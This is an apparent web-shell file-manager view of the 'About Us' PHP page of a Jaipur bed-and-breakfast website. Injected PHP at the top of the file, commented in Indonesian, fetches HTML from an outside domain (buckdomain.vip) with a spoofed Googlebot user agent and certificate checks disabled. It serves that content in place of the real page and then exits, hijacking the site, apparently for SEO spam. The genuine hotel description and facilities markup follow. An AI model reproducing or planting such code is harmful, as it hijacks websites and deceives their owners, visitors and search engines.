File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/rampurakothi.com/about.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/ledak388/www.rampurakothi.com-about.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <!-- TITLE --> <title>About Us | Rampura kothi </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <meta name="format-detection" content="telephone=no"> <meta name="apple-mobile-web-app-capable" content="yes"> <link rel="shortcut icon" href="images/favicon.png"/> <!-- CSS LIBRARY --> <link rel="stylesheet" type="text/css" href="css/lib/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="css/lib/font-lotusicon.css"> <link rel="stylesheet" type="text/css" href="css/lib/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="css/lib/owl.carousel.css"> <link rel="stylesheet" type="text/css" href="css/lib/jquery-ui.min.css"> <link rel="stylesheet" type="text/css" href="css/lib/magnific-popup.css"> <link rel="stylesheet" type="text/css" href="css/lib/settings.css"> <link rel="stylesheet" type="text/css" href="css/lib/bootstrap-select.min.css"> <!-- MAIN STYLE --> <link rel="stylesheet" type="text/css" href="css/style.css"> <link rel="stylesheet" type="text/css" href="css/responsive.css"> <style> .about-item{ text-align:justify; } </style> </head> <body> <!-- PAGE WRAP --> <div id="page-wrap"> <!-- HEADER --> <?php include 'include/header.php'?> </header> <!-- END / HEADER --> <!-- SUB BANNER --> <section class="section-sub-banner bg-16"> <div class="sub-banner"> <div class="container"> <div class="text text-center"> <h2>About Us</h2> </div> </div> </div> </section> <!-- END / SUB BANNER --> <!-- ABOUT --> <section class="section-about"> <div class="container"> <div class="about"> <!-- ITEM --> <div class="about-item"> <div class="img owl-single"> <img src="images/about-img.jpg" alt=""> </div> <div class="text"> <h2 class="heading">About Rampura kothi </h2> <span class="box-border"></span> <div class="desc"> <p> Rampura Kothi is a charming bed and breakfast located in the peaceful neighborhood of Hanuman Nagar, Jaipur. Just 4.5 km from Jaipur Railway Station and 8.5 km from the historic City Palace, this cozy retreat offers the perfect blend of traditional hospitality and modern comfort. The property features air-conditioned rooms, a serene garden, a spacious terrace, and essential amenities like free Wi-Fi and private parking. </p> <p>Guests also have access to a shared kitchen, making it ideal for both short and long stays. With a helpful 24-hour front desk and tour assistance, the staff ensures a smooth and personalized experience throughout your visit. </p> </div> </div> <div class="row"> <div class="col-md-12"> <p> The rooms at Rampura Kothi are thoughtfully equipped with bed linen, towels, a satellite flat-screen TV, and ironing services for added convenience. Whether you're traveling for leisure or business, the homely vibe and attentive service make it a standout choice. Popular Jaipur landmarks like Jantar Mantar and Hawa Mahal are easily accessible, both just under 9 km away. Additionally, the property offers car rental services, making it easier to explore the Pink City's vibrant culture and heritage. Rampura Kothi truly provides a peaceful escape while keeping the city's major attractions within reach.</p> </div> </div> </div> <!-- END / ITEM --> </div> </div> </section> <!-- END / ABOUT --> <section class="section-our-best bg-white"> <div class="container"> <div class="our-best"> <h2 class="heading">Facilities At Rampura kothi </h2> <span class="box-border"></span> <div class="row"> <div class="col-md-6 col-md-push-6"> <div class="img"> <img src="images/facilities-image.jpg" alt=""> </div> </div> <div class="col-md-6 col-md-pull-6 "> <div class="text"> <p> Rampura Kothi provides comfortable air-conditioned rooms, free Wi-Fi, private parking, a shared kitchen, garden area, ironing service, travel assistance, and a 24-hour front desk for a pleasant stay.</p> <ul> <li><div><img src="images/home/ourbest/parking-location.gif" alt="icon">Free private parking</div></li> <li><div><img src="images/home/ourbest/free-wifi.gif" alt="icon">Free Wi-Fi</div></li> <li><div><img src="images/home/ourbest/gardening-pots.gif" alt="icon">Terrace and garden</div></li> <li><div><img src="images/home/ourbest/cook.gif" alt="icon">Shared kitchen</div></li> <li><div><img src="images/home/ourbest/travel.gif" alt="icon">Tour and travel assistance</div></li> <li><div><img src="images/home/ourbest/cleaning-tools.gif" alt="icon">Daily housekeeping</div></li> <li><div><img src="images/home/ourbest/iron.gif" alt="icon">Ironing service</div></li> <li><div><img src="images/home/ourbest/air-conditioning.gif" alt="icon">Air conditioning</div></li> </ul> </div> </div> </div> </div> </div> </section> <!-- FOOTER --> <?php include 'include/footer.php'?> <!-- END / FOOTER --> </div> <!-- END / PAGE WRAP --> <!-- LOAD JQUERY --> <script type="text/javascript" src="js/lib/jquery-1.11.0.min.js"></script> <script type="text/javascript" src="js/lib/jquery-ui.min.js"></script> <script type="text/javascript" src="js/lib/bootstrap.min.js"></script> <script type="text/javascript" src="js/lib/bootstrap-select.js"></script> <script type="text/javascript" src="js/lib/isotope.pkgd.min.js"></script> <script type="text/javascript" src="js/lib/jquery.themepunch.revolution.min.js"></script> <script type="text/javascript" src="js/lib/jquery.themepunch.tools.min.js"></script> <script type="text/javascript" src="js/lib/owl.carousel.js"></script> <script type="text/javascript" src="js/lib/jquery.appear.min.js"></script> <script type="text/javascript" src="js/lib/jquery.countTo.js"></script> <script type="text/javascript" src="js/lib/jquery.countdown.min.js"></script> <script type="text/javascript" src="js/lib/jquery.parallax-1.1.3.js"></script> <script type="text/javascript" src="js/lib/jquery.magnific-popup.min.js"></script> <script type="text/javascript" src="js/lib/SmoothScroll.js"></script> <!-- validate --> <script type="text/javascript" src="js/lib/jquery.form.min.js"></script> <script type="text/javascript" src="js/lib/jquery.validate.min.js"></script> <!-- Custom jQuery --> <script type="text/javascript" src="js/scripts.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings